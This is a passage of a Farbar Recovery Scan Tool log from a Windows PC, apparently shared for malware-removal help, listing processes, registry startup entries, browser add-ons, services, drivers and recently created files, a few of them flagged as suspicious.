Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (McAfee, Inc.) C:\Program Files\TrueKey\McTkSchedulerService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe () C:\Program Files (x86)\Backblaze\bzbui.exe (Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Microsoft Corporation) C:\Windows\System32\mobsync.exe (Farbar) \\SPARTA\RedirectedFolders\cjerald\Desktop\FRST64.exe ==================== Registry (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2585744 2015-08-18] (NVIDIA Corporation) HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-11-05] (LogMeIn, Inc.) HKLM-x32\...\Run: [NUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [113288 2011-01-23] (Renesas Electronics Corporation) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation) HKLM-x32\...\Run: [Malwarebytes Anti-Malware] => C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe [3219456 2016-11-01] (Malwarebytes) Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.) HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-16] () HKU\S-1-5-18\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-16] () IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\756f18.lnk [2016-11-23] ShortcutTarget: 756f18.lnk -> (No File) Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\96da9b.lnk [2016-11-18] ShortcutTarget: 96da9b.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) GroupPolicyScripts: Restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.0.105 192.168.0.1 Tcpip\..\Interfaces\{C095AEBB-3422-4678-BFF1-85A8F1306E8D}: [DhcpNameServer] 192.168.0.105 192.168.0.1 Internet Explorer: ================== HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://msn.com/ SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation) BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL [2014-10-03] (Symantec Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-11-16] (Oracle Corporation) BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-16] (Oracle Corporation) BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated) Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated) Toolbar: HKU\S-1-5-21-3320201264-2921037059-4171379232-1148 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File DPF: HKLM-x32 {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} hxxps://secure.logmein.com//activex/ractrl.cab?lmi=1091 FireFox: ======== FF ProfilePath: C:\Users\cjerald\AppData\Roaming\Mozilla\Firefox\Profiles\2ak3a5ce.default-1478012619453 [2016-11-21] FF Homepage: Mozilla\Firefox\Profiles\2ak3a5ce.default-1478012619453 -> hxxp://www.msn.com/ FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-12-17] [not signed] FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFFPlgn => not found FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_162.dll [2016-09-26] () FF Plugin: @microsoft.com/GENUINE -> disabled [No File] FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-09-26] () FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-16] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-16] (Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-17] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-17] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.) FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2013-09-03] (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-3320201264-2921037059-4171379232-1148: @citrixonline.com/appdetectorplugin -> C:\Users\cjerald\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-01-07] (Citrix Online) Chrome: ======= CHR DefaultProfile: Default CHR Profile: C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default [2016-11-30] CHR Extension: (Google Docs) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-19] CHR Extension: (Google Drive) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-06-13] CHR Extension: (YouTube) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-06-13] CHR Extension: (Google Search) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-20] CHR Extension: (Google Docs Offline) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-06-13] CHR Extension: (Avast Online Security) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-11-09] CHR Extension: (Chrome Web Store Payments) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-06-13] CHR Extension: (Gmail) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-20] CHR Extension: (Chrome Media Router) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-01] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 bzserv; C:\Program Files (x86)\Backblaze\bzserv.exe [356008 2016-11-16] () R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148560 2015-08-18] (NVIDIA Corporation) S4 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\g2aservice.exe [309080 2014-07-24] (Citrix Online, a division of Citrix Systems, Inc.) R2 IntelBCAsvc; C:\Program Files\Intel\BCA\pabeSvc64.exe [3020440 2015-11-25] (Intel(R) Corporation) R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [419336 2016-10-12] (LogMeIn, Inc.) R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [509448 2016-10-12] (LogMeIn, Inc.) R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-11-05] (LogMeIn, Inc.) R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1706128 2015-08-18] (NVIDIA Corporation) R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [21833360 2015-08-18] (NVIDIA Corporation) R2 psqlWGE; C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe [435488 2009-11-17] (Pervasive Software Inc.) R2 SepMasterService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe [144496 2014-10-03] (Symantec Corporation) R3 SmcService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe [2379128 2014-10-03] (Symantec Corporation) S3 SNAC; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe [335216 2014-10-03] (Symantec Corporation) R2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [874784 2016-04-21] (McAfee, Inc.) R2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [15736 2016-04-21] (McAfee, Inc.) S3 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [86864 2016-04-21] (McAfee, Inc.) S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R1 BHDrvx64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20161128.001\BHDrvx64.sys [1874136 2016-11-07] (Symantec Corporation) R1 ccSettings_{690CFB39-3E68-4966-A470-3A946C640A12}; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys [169048 2014-10-03] (Symantec Corporation) R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation) R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-11-16] (Symantec Corporation) R1 IDSVia64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20161129.011\IDSvia64.sys [1012952 2016-10-26] (Symantec Corporation) R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-11-05] (LogMeIn, Inc.) R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161130.002\ENG64.SYS [138456 2016-11-30] (Symantec Corporation) R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161130.002\EX64.SYS [2148056 2016-11-30] (Symantec Corporation) R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2015-08-18] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38032 2015-08-18] (NVIDIA Corporation) R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSP64.SYS [867032 2014-10-03] (Symantec Corporation) R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSPX64.SYS [36952 2014-10-03] (Symantec Corporation) S3 SyDvCtrl; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyDvCtrl64.sys [35432 2014-10-03] (Symantec Corporation) R0 SymDS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMDS64.SYS [493656 2014-10-03] (Symantec Corporation) R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMEFA64.SYS [1148120 2014-10-03] (Symantec Corporation) R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2016-11-16] (Symantec Corporation) R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\Ironx64.SYS [225496 2014-10-03] (Symantec Corporation) R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMNETS.SYS [437976 2014-10-03] (Symantec Corporation) R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [155472 2016-11-16] (Symantec Corporation) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-11-30 04:42 - 2016-11-30 04:44 - 00000000 ____D C:\Users\cjerald\Doctor Web 2016-11-23 14:52 - 2016-11-23 14:52 - 00082894 _____ C:\Users\cjerald\Downloads\Waiver of Lien-Blank form Green Space (2).pdf 2016-11-23 14:52 - 2016-11-23 14:52 - 00082894 _____ C:\Users\cjerald\Downloads\Waiver of Lien-Blank form Green Space (1).pdf 2016-11-23 14:31 - 2016-11-23 14:31 - 00082894 _____ C:\Users\cjerald\Downloads\Waiver of Lien-Blank form Green Space.pdf 2016-11-22 00:42 - 2016-11-22 00:42 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task 2016-11-21 09:28 - 2016-11-30 04:44 - 00000000 ____D C:\Users\cjerald\AppData\Local\322148 2016-11-19 16:32 - 2016-12-01 04:41 - 00000000 ____D C:\FRST 2016-11-18 16:04 - 2016-11-18 19:25 - 00000000 ____D C:\Users\cjerald\Pavark 2016-11-18 15:23 - 2016-11-19 16:30 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable) 2016-11-18 15:20 - 2016-11-18 15:48 - 00000000 ____D C:\Users\cjerald\Downloads\Rootkit Removers 2016-11-16 22:11 - 2016-11-16 22:11 - 06449720 _____ C:\Users\cjerald\Downloads\install_backblaze.exe 2016-11-16 22:08 - 2016-11-18 11:02 - 00000000 ____D C:\Program Files\MyDefrag v4.3.1 2016-11-16 22:08 - 2016-11-16 22:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyDefrag v4.3.1 2016-11-16 22:08 - 2010-05-21 12:11 - 01147392 _____ (J.C. Kessels) C:\Windows\system32\MyDefragScreenSaver_v4.3.1.exe 2016-11-16 22:08 - 2010-05-21 12:11 - 00485376 _____ (J.C. Kessels) C:\Windows\system32\MyDefragScreenSaver_v4.3.1.scr 2016-11-16 22:07 - 2016-11-16 22:07 - 02082630 _____ (J.C. Kessels ) C:\Users\cjerald\Downloads\MyDefrag-v4.3.1.exe 2016-11-16 21:31 - 2016-11-16 21:31 - 00110424 _____ C:\Users\clayton\AppData\Local\GDIPFONTCACHEV1.DAT 2016-11-16 21:19 - 2016-11-16 21:19 - 00000000 ____D C:\Users\clayton\AppData\Local\NVIDIA Corporation 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Roaming\Windows Small Business Server 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Roaming\Adobe 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\Symantec 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\NVIDIA 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\LogMeIn 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\Google 2016-11-16 21:17 - 2016-11-16 21:17 - 00000000 ____D C:\Users\clayton\AppData\Local\VirtualStore 2016-11-16 07:58 - 2016-11-16 07:58 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll 2016-11-16 07:58 - 2016-11-16 07:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2016-11-16 07:58 - 2016-11-16 07:58 - 00000000 ____D C:\Program Files (x86)\Java 2016-11-16 07:54 - 2016-11-16 07:54 - 00000000 ____D C:\Users\cjerald\AppData\Roaming\Sun 2016-11-16 07:51 - 2016-11-16 07:51 - 00737344 _____ (Oracle Corporation) C:\Users\cjerald\Downloads\chromeinstall-8u111.exe 2016-11-16 02:55 - 2016-11-16 02:55 - 00000000 ____D C:\ProgramData\Sophos 2016-11-16 02:54 - 2016-11-16 02:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos 2016-11-16 02:54 - 2016-11-16 02:54 - 00000000 ____D C:\Program Files (x86)\Sophos 2016-11-16 02:50 - 2016-11-16 02:51 - 155406624 _____ (Sophos Limited) C:\Users\cjerald\Downloads\Sophos Virus Removal Tool.exe 2016-11-16 00:34 - 2016-11-16 00:34 - 00448512 _____ (OldTimer Tools) C:\Users\cjerald\Downloads\TFC.exe 2016-11-15 13:32 - 2016-11-15 15:03 - 00044360 __RSH C:\ProgramData\ntuser.pol 2016-11-15 02:13 - 2016-08-22 14:20 - 00332512 _____ (Trend Micro Inc.) C:\Windows\system32\Drivers\tmcomm.sys 2016-11-15 02:12 - 2016-11-15 02:12 - 02527376 _____ (Trend Micro Inc.) C:\Users\cjerald\Downloads\HousecallLauncher64 (1).exe 2016-11-14 19:40 - 2016-11-14 19:40 - 00000000 ____D C:\Users\cjerald\AppData\Local\ESET 2016-11-14 19:39 - 2016-11-14 19:39 - 06761600 _____ (ESET spol. s r.o.) C:\Users\cjerald\Downloads\esetonlinescanner_enu.exe 2016-11-14 19:07 - 2016-11-14 19:07 - 00023783 _____ C:\ComboFix.txt 2016-11-14 13:00 - 2016-10-07 18:25 - 00002291 ____N C:\Windows\system32\SetupBD.din 2016-11-14 12:55 - 2016-11-14 12:55 - 81335920 _____ C:\Users\cjerald\Downloads\PROWinx64.exe 2016-11-14 12:43 - 2016-11-14 12:43 - 00362144 _____ (Roadkil.Net ) C:\Users\cjerald\Downloads\CommTest.exe 2016-11-14 12:43 - 2016-11-14 12:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Roadkil.Net 2016-11-14 12:43 - 2016-11-14 12:43 - 00000000 ____D C:\Program Files (x86)\Roadkil.Net 2016-11-09 15:50 - 2016-11-02 10:36 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll 2016-11-09 15:50 - 2016-11-02 10:32 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll 2016-11-09 15:50 - 2016-11-02 10:32 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll 2016-11-09 15:50 - 2016-11-02 10:32 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll 2016-11-09 15:50 - 2016-11-02 10:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll 2016-11-09 15:50 - 2016-11-02 10:22 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll 2016-11-09 15:50 - 2016-11-02 10:16 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll 2016-11-09 15:50 - 2016-11-02 10:16 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll 2016-11-09 15:50 - 2016-11-02 10:16 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll 2016-11-09 15:50 - 2016-11-02 09:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll 2016-11-09 15:50 - 2016-10-27 22:59 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2016-11-09 15:50 - 2016-10-27 22:14 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2016-11-09 15:50 - 2016-10-27 14:13 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2016-11-09 15:50 - 2016-10-27 14:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2016-11-09 15:50 - 2016-10-27 13:55 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2016-11-09 15:50 - 2016-10-27 13:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2016-11-09 15:50 - 2016-10-27 13:54 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2016-11-09 15:50 - 2016-10-27 13:53 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2016-11-09 15:50 - 2016-10-27 13:53 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2016-11-09 15:50 - 2016-10-27 13:51 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2016-11-09 15:50 - 2016-10-27 13:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2016-11-09 15:50 - 2016-10-27 13:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2016-11-09 15:50 - 2016-10-27 13:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2016-11-09 15:50 - 2016-10-27 13:37 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2016-11-09 15:50 - 2016-10-27 13:37 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2016-11-09 15:50 - 2016-10-27 13:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2016-11-09 15:50 - 2016-10-27 13:37 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2016-11-09 15:50 - 2016-10-27 13:28 - 25763328 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2016-11-09 15:50 - 2016-10-27 13:28 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2016-11-09 15:50 - 2016-10-27 13:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2016-11-09 15:50 - 2016-10-27 13:19 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2016-11-09 15:50 - 2016-10-27 13:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2016-11-09 15:50 - 2016-10-27 13:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll 2016-11-09 15:50 - 2016-10-27 13:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2016-11-09 15:50 - 2016-10-27 13:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2016-11-09 15:50 - 2016-10-27 13:05 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2016-11-09 15:50 - 2016-10-27 13:02 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll 2016-11-09 15:50 - 2016-10-27 12:49 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll 2016-11-09 15:50 - 2016-10-27 12:46 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2016-11-09 15:50 - 2016-10-27 12:46 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2016-11-09 15:50 - 2016-10-27 12:44 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2016-11-09 15:50 - 2016-10-27 12:44 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2016-11-09 15:50 - 2016-10-27 12:17 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2016-11-09 15:50 - 2016-10-27 12:16 - 02920448 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2016-11-09 15:50 - 2016-10-27 12:03 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2016-11-09 15:50 - 2016-10-27 11:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2016-11-09 15:50 - 2016-10-27 10:05 - 20304896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2016-11-09 15:50 - 2016-10-25 10:02 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2016-11-09 15:50 - 2016-10-22 12:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2016-11-09 15:50 - 2016-10-22 12:36 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2016-11-09 15:50 - 2016-10-22 12:36 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll 